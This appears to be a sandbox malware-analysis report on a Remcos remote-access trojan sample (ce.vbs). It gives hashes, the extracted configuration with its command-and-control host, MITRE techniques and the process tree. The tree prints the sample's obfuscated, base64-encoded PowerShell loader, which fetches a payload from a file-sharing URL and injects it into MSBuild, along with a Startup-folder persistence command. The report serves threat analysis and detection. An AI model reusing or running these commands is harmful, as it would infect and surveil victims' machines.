remcos | 20df5a030d038d90d345e184bb5413aeeb38cf1be522099ac4ea376c31195974

General

Target

ce.vbs
Size

12KB
MD5

24a5eb1c1b75ab29f6c090f1038c3835
SHA1

edf754d24c9203b1ef43cc4b2493b6fd13b5b818
SHA256

20df5a030d038d90d345e184bb5413aeeb38cf1be522099ac4ea376c31195974
SHA512

fa101576f48116a45dd03fb4938023f3542b077492d0d1ff395a9f829c4b78ecaff247ad01ebb0769712057b620e6e9f853e2b11bd3a5d97fb0406a9239f5290
SSDEEP

192:PyUrlOx2qeAQm1CcUWgeAQZeyjzp+UhSAGGuGHRkfko:KURb3ODPwUgAuGHRk8o

Score

10^/10

remcos cee discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

cee

C2

cee.work.gd:2531

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
vlc
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
ios
mouse_option
false
mutex
gig-1IH5DX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
sos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1004	WScript.exe
6	1004	WScript.exe
25	4508	powershell.exe
28	4508	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
460	powershell.exe
752	powershell.exe
4508	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4508 set thread context of 4320	4508	powershell.exe	101

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
396	cmd.exe
2912	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2912	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
460	powershell.exe
460	powershell.exe
752	powershell.exe
752	powershell.exe
4508	powershell.exe
4508	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	460	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4320	MSBuild.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1004 wrote to memory of 396	1004	WScript.exe	87
PID 1004 wrote to memory of 396	1004	WScript.exe	87
PID 396 wrote to memory of 2912	396	cmd.exe	89
PID 396 wrote to memory of 2912	396	cmd.exe	89
PID 396 wrote to memory of 460	396	cmd.exe	97
PID 396 wrote to memory of 460	396	cmd.exe	97
PID 1004 wrote to memory of 752	1004	WScript.exe	98
PID 1004 wrote to memory of 752	1004	WScript.exe	98
PID 752 wrote to memory of 4508	752	powershell.exe	100
PID 752 wrote to memory of 4508	752	powershell.exe	100
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101
PID 4508 wrote to memory of 4320	4508	powershell.exe	101

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ce.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\ce.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\ce.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRWRVJiT1NFUFJFRmVSRU5DZS50T3N0UmlORygpWzEsM10rJ1gnLWpPaW4nJykgKCgnVVdxaW1hZ2VVcmwgPSB6dVhodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDRmIHp1WDtVV3F3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuVycrJ2ViQ2xpZW50O1VXcWltYWdlQnl0ZXMgPSBVV3F3ZWJDbGllbnQuRG93bmxvYWREYXRhKFVXcWltYWdlVXJsKTtVV3FpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2QnKydpbmddOjpVVEY4LkdldFN0cmluZyhVV3FpbWFnZUJ5dGVzKTtVV3FzdGFydEZsYWcgPSB6dVg8PEJBU0U2NF9TVEFSVD4+enVYO1VXcWVuZEZsYWcgPSB6dVg8JysnPEInKydBU0U2NF9FTkQ+Pnp1WDtVV3FzdGFydEluZGV4ID0gVVdxaW1hZ2VUZXh0LkluZGV4T2YoVVdxc3RhcnRGbGFnKTtVV3FlbmRJbmRleCA9IFVXcWltYWdlVGV4dC5JbmRleE9mKFVXcWVuZEYnKydsYWcpO1VXcXMnKyd0YXJ0SW5kZXggLWdlIDAgLWFuZCBVV3FlbmRJJysnbmRleCAtZ3QgVVdxc3RhcnRJbmRleDtVV3FzdGFydEluZGV4ICs9IFVXcXN0YXJ0RmxhZy5MZW5ndGg7VVdxYmFzZTY0TGVuZ3RoID0gVVdxZW5kSW5kZXggLSBVV3FzdGFydCcrJ0luZGV4O1VXcWJhc2U2NENvbW1hbmQgPSBVV3FpbWFnZVRleHQuJysnU3Vic3RyaW5nKCcrJ1VXcXN0JysnYXJ0SW5kZXgsIFVXcWJhc2U2NExlbmd0aCk7VVcnKydxYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoVVdxYmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIElKciBGb3JFYWNoLU9iamVjdCB7IFVXcV8gfSlbLTEuLi0oVVdxYmFzZTY0JysnQ29tbScrJ2FuZC5MZW5ndGgpXTtVV3Fjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFVXcWJhc2UnKyc2NFInKydldmVyc2VkKTtVV3Fsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoVVdxY29tbWEnKyduZEJ5dGVzKTtVVycrJ3F2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHp1WFZBSXp1WCk7VVdxdmFpTWV0aG9kLicrJ0ludm9rZShVV3FudWxsLCBAKHp1WDAvdGNwMFIvZC9lZS5ldHNhcC8vOnNwdHRoenVYLCB6dVhkZXNhdGl2YWRvenVYLCB6dVhkZXNhdGl2YWRvenVYLCB6dVhkZXNhdGl2YWRvenVYLCB6dVhNU0J1aWxkenVYLCB6dVhkZXNhdGl2YWRvenVYLCB6dVhkZXNhdGl2YWRvenVYLHp1WGRlc2F0aXZhZG96dVgsenVYZGVzYXRpdmFkJysnb3p1WCx6dVhkZScrJ3NhdGl2YWRvenVYLHp1WGRlc2F0aXZhZG96dVgsenVYZGVzJysnYXRpdmFkb3p1WCx6dVgxenVYLHp1WGRlc2F0aXZhZG96dVgpKTsnKS5SZVBMQUNlKCd6dVgnLFtzdHJJTmddW0NIQVJdMzkpLlJlUExBQ2UoJ1VXcScsJyQnKS5SZVBMQUNlKChbQ0hBUl03MytbQ0hBUl03NCtbQ0hBUl0xMTQpLCd8Jykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $VERbOSEPREFeRENCe.tOstRiNG()[1,3]+'X'-jOin'') (('UWqimageUrl = zuXhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a0904f zuX;UWqwebClient = New-Object Sys'+'tem.Net.W'+'ebClient;UWqimageBytes = UWqwebClient.DownloadData(UWqimageUrl);UWqimageText = [System.Text.Encod'+'ing]::UTF8.GetString(UWqimageBytes);UWqstartFlag = zuX<<BASE64_START>>zuX;UWqendFlag = zuX<'+'<B'+'ASE64_END>>zuX;UWqstartIndex = UWqimageText.IndexOf(UWqstartFlag);UWqendIndex = UWqimageText.IndexOf(UWqendF'+'lag);UWqs'+'tartIndex -ge 0 -and UWqendI'+'ndex -gt UWqstartIndex;UWqstartIndex += UWqstartFlag.Length;UWqbase64Length = UWqendIndex - UWqstart'+'Index;UWqbase64Command = UWqimageText.'+'Substring('+'UWqst'+'artIndex, UWqbase64Length);UW'+'qbase64Reversed = -join (UWqbase64Command.ToCha'+'rArray() IJr ForEach-Object { UWq_ })[-1..-(UWqbase64'+'Comm'+'and.Length)];UWqcommandBytes = [System.Convert]::FromBase64String(UWqbase'+'64R'+'eversed);UWqloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(UWqcomma'+'ndBytes);UW'+'qvaiMethod = [dnlib.IO.Home].GetMethod(zuXVAIzuX);UWqvaiMethod.'+'Invoke(UWqnull, @(zuX0/tcp0R/d/ee.etsap//:sptthzuX, zuXdesativadozuX, zuXdesativadozuX, zuXdesativadozuX, zuXMSBuildzuX, zuXdesativadozuX, zuXdesativadozuX,zuXdesativadozuX,zuXdesativad'+'ozuX,zuXde'+'sativadozuX,zuXdesativadozuX,zuXdes'+'ativadozuX,zuX1zuX,zuXdesativadozuX));').RePLACe('zuX',[strINg][CHAR]39).RePLACe('UWq','$').RePLACe(([CHAR]73+[CHAR]74+[CHAR]114),'|'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ios\logs.dat

Filesize
144B

MD5
49c4bb72f13d2116953fb4e5a76850b9

SHA1
f92e9e84f3089a2c52c0b7964fc898bca1407fbe

SHA256
66beacfd12ca3349f416ea896582bfab046f37b328e100b74699b19750ff2c1e

SHA512
6f473a92e4e5faf1a6d9de74f73d5cdbe48dbf722b5a932d373346e73df91c71b39d2c45e8735da86365b70968201e5a0df529ab9de9ab83c2a8d7ac5a647bf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
ddcb547208a14eb1efd172f0a4a00514

SHA1
90bf6030e5f74e9a68f6d7e4e40e9d49a68032e1

SHA256
5ce6d73522f67087c1ca672461066d67726385406c295b255910624983a3a151

SHA512
8720d94a9ef549d5dd3c40dcd8b4a767868308a05d7ca6b846e3ced133e83bda6ab8b883463c1b8f8389d8f5d5f0dfe9df04b66df3997016fea9ecc83c0c2b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hf0sisyv.y3r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/460-17-0x00007FFB681D0000-0x00007FFB68C91000-memory.dmp

Filesize
10.8MB

Download
memory/460-12-0x00007FFB681D0000-0x00007FFB68C91000-memory.dmp

Filesize
10.8MB

Download
memory/460-16-0x00007FFB681D0000-0x00007FFB68C91000-memory.dmp

Filesize
10.8MB

Download
memory/460-13-0x00007FFB681D0000-0x00007FFB68C91000-memory.dmp

Filesize
10.8MB

Download
memory/460-11-0x00000199469B0000-0x00000199469D2000-memory.dmp

Filesize
136KB

Download
memory/460-1-0x00007FFB681D3000-0x00007FFB681D5000-memory.dmp

Filesize
8KB

Download
memory/4320-47-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-67-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-44-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-39-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-75-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-54-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-55-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-56-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-57-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-59-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-41-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-66-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4320-74-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4508-38-0x00000173F8B90000-0x00000173F8CE8000-memory.dmp

Filesize
1.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads